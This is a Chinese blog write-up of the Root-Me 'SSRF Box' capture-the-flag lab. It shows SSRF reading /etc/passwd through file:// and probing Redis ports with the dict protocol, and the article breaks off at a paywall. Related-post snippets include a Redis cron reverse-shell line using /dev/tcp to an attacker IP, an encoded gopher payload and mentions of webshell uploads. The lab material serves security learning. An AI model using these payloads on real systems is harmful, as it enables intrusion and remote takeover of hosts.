Root me CTF all the day靶场ssrf+redis漏洞

于 2024-10-10 00:08:36 发布
阅读量1.6k 收藏 12
点赞数 28
文章标签: redis dubbo web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/M372109150/article/details/142753080
版权

Rootme CTF all the day靶场ssrf+redis漏洞

一、环境介绍

1、漏洞地址

https://www.root-me.org/en/Capture-The-Flag/CTF-all-the-day/

2、漏洞介绍

SSRF+redis 获取内网主机权限,利用SSRF来对redis的未授权访问执行命令。从而达到获取主机权限的目的

二、 搭建环境

首先需要创建账号,点击右上的绿色小加号来创建账号,创建完成后回到此页面。找到一个处于none的虚拟机,点击房间名,如下的ctf12
在这里插入图片描述
然后进入之后选择需要创建的虚拟机,选择SSRF Box,点击保存,选择start the game。选择完成之后需要加载(等待一会)然后访问 ctf12.root-me.org 就可以看到启动的虚拟环境了(如下图)
在这里插入图片描述

三、测试过程

访问ctf12.root-me.org

在这里插入图片描述
在页面的输入框中输入百度地址后,会把百度首页加载进来。
在这里插入图片描述
在这里插入图片描述

3.1 读取系统文件

1、可以在输入框中随便输一个url,抓包,然后把包发送到Repeater模块,把url后面的内容修改为 file://…/…/…/etc/passwd,来读取该文件
在这里插入图片描述

3.2 探测开放的服务器端口(dict协议)

dict协议一般常用来探测内网主机以及端口开放情况,既然能够探测端口,那么可以探测不同端口对应的服务的指纹信息。当然dict协议也可以用来执行一些服务的命令
注意:dict执行命令多行操作的命令时,只能一次执行单行,需分多次执行。

首先将包发送到Intruder模块,爆破端口,端口开放显示为OK,没有开放显示为Connection refused。

在这里插入图片描述
这里我们已经知道是6379端口了,所以为了不浪费时间,区间就设置为6000-7000
在这里插入图片描述
端口没有开放显示(如下图)

最低0.47元/天 解锁文章
SSRF+redis未授权漏洞复现
qq_57094995的博客
10-04 756
ssrf+redis未授权漏洞的复现
root-me:network(一)
qingjie0ng的博客
12-31 1936
前言:部分wp,剩下的有空会补上,属于流量分析题 FTP-authentication 地址:Challenges/Network : FTP - authentication [Root Me : Hacking and Information Security learning platform] (root-me.org) 题目:通过 FTP 实现的经过身份验证的文件交换。恢复用户使用的密码。(FTP请求过程中的流量抓取生成了文件,我们要从其中进行数据包捕获分析) 步骤: 开始挑战,会
RootMe
z4yn:)的博客
10-09 1104
RootMe 获取root权限 先Nmap扫全端口,开放了22,80端口 在用Nmap -A 综合扫描指定的开放端口 只能从80端口入手,访问80 尝试访问一下robots.txt文件,不存在 用dirbutser扫网站目录,我一般配合dirb一起扫 两个都扫到一个uploads目录和panel目录 uploads通常用来放上传的文件 访问panel目录是个上传点,直接上传一个反弹shell的PHP脚本 用的是kali自带的PH...
ssrf+redis未授权靶场
actistsec的博客
10-25 2231
自己搭建不太合理的ssrf联动redis未授权
CTF SSRF redis写入shell、计划任务
03-07 1287
CTF SSRF redis写入shell、计划任务
RootMe--HTTP - POST
weixin_34253539的博客
04-03 786
题目链接:https://www.root-me.org/en/Challenges/Web-Server/HTTP-POST 打开题目有一个Give a try!的框,点击让分数超过999999。 不管怎么点分数都超不过,按F12找到Elements下面发现有一个函数 可直接修改方框里的内容,使其超过999999。然后点击方框得到flag flag:H7tp_h4s_N0_...
通过SSRF操作Redis主从复制写Webshell_R3start1
08-03
1.使用 DICT 协议添加一条测试记录 2.设置保存路径 3.设置保存文件名 4.保存 1.连接远程主服务器 2.设置保存路径 3.设置保存文件名 4.保存
CTFHUB-SSRF-Redis协议
qq_62078839的博客
04-23 2199
利用工具gopherus来生成payload 这里我们进行第二次url编码时,不需要再将%0a换为%0d%0a了,因为生成的payload已经替换了 gopher%3A//127.0.0.1%3A6379/_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252432%250D%250A%250...
CTFHub靶场渗透~SSRF注入
weixin_67832625的博客
07-30 491
此代码是通用的回环地址,我们就可以将其放到url后面,最后得到结果。发现页面有提示,我们直接看源码拿下flag。好小子,离成功又近一步!
RootMe--HTTP Headers
weixin_34357962的博客
04-03 280
题目链接:https://www.root-me.org/en/Challenges/Web-Server/HTTP-Headers 题目提示: 1. HTTP response里有信息 2. administrator身份访问网页 打开题目里面有一句话:Content并不是HTTP响应的唯一部分,再加上题目是HTTP Headers。按下F12 Google chromeF1...
root_me.zip
04-25
root工具,用来对u8860进行root
Rootme-WriteUp:来自tryhackmeRootME文章
04-13
RootME-tryhackme 通过0xRar 扫描 nmap -T4 -A -p- MACHINE_IP Nmap scan report for MACHINE_IP Host is up (0.15s latency). Not shown: 65464 closed ports, 69 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 4a:b9:16:08:84:c2:54:48:ba:5c:fd:3f:22:5f:22:14 (RSA) | 256 a9:a6:86:e8:ec:96:c3:f0:03:cd:16:d5:49
ctfhub SSRF Redis协议
m0_63944205的博客
07-24 353
5.这里报错我们先不用管尝试查询一下,我们看到我们的一句话木马传入成功。4.然后将编码后的gopher传入网址。3.将生成gopher拿去url编码。7.进入文件夹查找flag文件。2.使用工具生成gopher。6.这里我们用蚁剑进行连接。
利用Weblogic中间件存在的SSRF漏洞结合redis未授权访问漏洞GetShell
wenqingshuo321的博客
10-11 916
在Search Public Registries,选择Public Registry中的 IBM,同时勾选Search by business name,开启bp进行抓包,点击search。set 1 "\n\n\n\n * * * * * root bash -i >& /dev/tcp/{本地物理机ip}/1234 0>&1\n\n\n\n"给redis服务器发送三条命令,将其写入redis的容器里里面的/etc/crontab,从而将shell反弹到本地物理机ip的1234端口。
RootMe--Improper redirect
weixin_34268843的博客
04-03 177
题目链接:https://www.root-me.org/en/Challenges/Web-Server/Improper-redirect 题目提示: 1. 不正确的重定向 2. 获取访问索引的权限 打开题目有一个登录框,且链接后面有redirect,随便输入用户名密码,显示认证失败。既然是想访问index,尝试访问: http://challenge01.root-m...
RootMe--HTML
weixin_34292924的博客
04-02 219
题目链接:  http://challenge01.root-me.org/web-serveur/ch1/ 入门题,打开浏览器,按F12可看到一段注释 得到flag:nZ^&@q5&sjJHev0 转载于:https://www.cnblogs.com/yuuki-aptx/p/10644254.html...
Tryhackme-RootMe
个人博客
09-23 421
RootMe 文章目录RootMeTask1 Deploy the machineTask2 ReconnaissanceTask3 Getting a shellTask4 Privilege escalation Task1 Deploy the machine Deploy the machine Task2 Reconnaissance 1.Scan the machine, how many ports are open? 2 2.What version of Apache is runnin
RootMe--HTTP - Open redirect
weixin_34072637的博客
04-02 503
题目链接:https://www.root-me.org/en/Challenges/Web-Server/HTTP-Open-redirect 点开题目后发现有三个图标链接,点击slack,发现链接后面加了字符串然后跳转到了slack的官网。先用burp suite分析下 果然后面加了一串数字,看着像MD5的特征,找个在线MD5解密网站解一下https://www.md5online...
THM学习笔记—RootMe
jiangyu0_0的博客
03-16 546
THM学习笔记—RootMe
CTFHUB SSRF漏洞
最新发布
02-25
### CTFHUB 平台上的 SSRF 漏洞详情 在 CTFHUB 平台上,SSRF (Server-Side Request Forgery, 服务器端请求伪造) 是一种常见且重要的漏洞类别。该类漏洞允许攻击者通过构造特定的 URL 或参数来诱导服务器向指定目标发起 HTTP 请求。 #### 基本概念与影响范围 通常情况下,SSRF 攻击旨在使受害的应用程序作为代理去访问那些对外部网络不可见但对应用程序可见的服务资源。这些内部服务可能存储敏感数据或提供管理接口,一旦被恶意利用可能导致严重的后果[^3]。 #### 利用方式实例分析 对于某些 PHP 应用环境下的 SSRF 场景,在实际操作过程中发现了一种特殊的 payload 构造方法: ```plaintext http://challenge-80b40c7bb0f917cb.sandbox.ctfhub.com:10800/?url=http://notfound.ctfhub.com@127.0.0.1/flag.php ``` 上述 Payload 的特点在于它巧妙地运用了 `@` 符号将外部域名指向本地 IP (`127.0.0.1`) ,从而绕过了简单的黑名单过滤机制并成功触发了 SSRF 行为,最终实现了对 `/flag.php` 文件内容的非法获取[^4]。 #### 解决方案建议 针对此类问题的有效缓解措施可以从以下几个方面入手: - **输入验证加强**:严格校验用户提交的数据合法性,特别是涉及远程调用功能时要特别谨慎处理 URL 参数。 - **白名单策略实施**:仅限于信任列表内的主机名/IP 进行通信交互;同时考虑加入 DNS 缓存刷新逻辑防止缓存投毒风险。 - **协议限制应用**:避免支持过多不必要的协议(如 gopher:// 等),减少潜在威胁面。 - **防火墙配置优化**:合理设置云服务商提供的安全组规则以及 VPC 内网 ACL 控制,阻止来自公网对私有子网内资产的未授权访问尝试。 综上所述,为了有效防范 SSRF 类型的安全隐患,开发团队应当综合采取多种防护手段相结合的方式,并持续关注最新的攻防动态和技术趋势以确保系统的安全性得到保障[^2]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Fly`

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值